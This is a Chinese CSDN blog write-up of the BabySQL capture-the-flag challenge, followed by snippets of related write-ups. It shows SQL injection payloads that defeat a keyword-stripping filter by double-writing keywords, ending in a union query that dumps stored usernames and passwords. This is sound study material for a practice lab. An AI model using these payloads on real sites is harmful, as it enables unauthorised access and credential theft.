[极客大挑战 2019]BabySQL

最新推荐文章于 2021-11-22 23:06:44 发布
最新推荐文章于 2021-11-22 23:06:44 发布
阅读量111 收藏
点赞数
分类专栏: SQL注入
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114418948
版权

尝试:
?username=admin&password=1' or 1=1#

在这里插入图片描述
?username=admin&password=1' and 1=6#
在这里插入图片描述
仔细看报错信息的最后1=1 和1=6。我们可以怀疑and和or是被替换成
尝试双写:

?username=admin&password=pwd' anandd 1=6#

在这里插入图片描述
页面不报错了,显示正常的输入错误信息,由此的知是有关键词被替换成空的,可能是利用了replace函数
继续测试union 、select 、 information等等这样的关键词
?username=admin&password=pwd' union select 1,2#
在这里插入图片描述
?username=admin&password=pwd' union selecselectt 1,2#
在这里插入图片描述
发现select也是被过滤的,双写即可…


?username=admin&password=pwd' uniounionn selecselectt 1,2#
在这里插入图片描述
发现回显不一样了,提示列不一致,说明了union也是被过滤


?username=admin&password=pwd' uniounionn selecselectt 1,2,3#
在这里插入图片描述
发现正常回显,说明有select了三列,但第二三个位置才有回显


pwd' uniounionn seselectlect 1,2,group_concat(table_name) frofromm information_schema.tables where table_schema=database() #

在这里插入图片描述
发现where也被过滤了,那么双写,同时可以猜到from也要双写


pwd' uniounionn seselectlect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema=database() #
在这里插入图片描述
注意这里的information要写作infoorrmation才行


最终:
pwd' uniounionn seselectlect 1,2,group_concat(id,username,passwoorrd) frofromm b4bsql #

需要group_concat()将所有结果汇聚到一个显示占位,因为有可能显示是不会显示全部的

总结:

这题主要是将关键词替换成空的问题,双写是解决办法
同时, 检测过滤内容才是整道题最为关键的

D.MIND
关注
专栏目录
[极客挑战 2019]BabySQL 1 详细题解
偷一个月亮
09-01 6189
过滤 select or and union from http://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 435
BUUCTF的[极客挑战 2019]BabySQL 1
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 227
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1493
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1612
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
极客挑战2019——baby sql
qq_44308327的博客
11-22 752
baby sql(注意双写绕过) 判断注入类型 既然是sql注入题,那就先判断注入的数据类型 payload: ?username=admin&password=1 payload: ?username=admin&password=2-1 //判断页面是否发生变化,如有变化则为字符型注入,反之则为整型注入 无变化,所以为整型注入 判断回显位 payload:?username=admin&password=1' order by 3%23 ...
BUUCTF:[极客挑战 2019]BabySQL
末初的CSDN博客
11-04 753
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL 简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示 使用Burp进行SQL过滤字符的Fuzz 这些长度为726响应内容是Input your username and password的Fuzz结果是被过滤的字符 Trick 替换为空的关键字过滤使用双写关键字绕过 这里空格.
BUU WEB [极客挑战 2019]BabySQL
star_feather的博客
02-01 222
看题目,明显是一个SQL注入,打开网页,直接用万能密码登陆试试看: 不行,那就只能老老实实一步一步的走了,先order by: 错误! 这就很尬了,但我们可以从提示信息里发现一些有趣的东西,万能密码里的提示信息是or之后的信息,order by也是,而且是der…,那是不是可以推测,or是被检测到删除了?!我么你回到万能密码再试一次,这次双写oorr: 成功登陆! 这说明我们的推测是正确的,那这里就是双写绕过了呗。 我们将提示错误的信息里被删除的关键词都双写,就可以正常的注入啦(在之后的注入里会发现f
[极客挑战 2019]babysql
最新发布
03-16
"极客挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目。题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值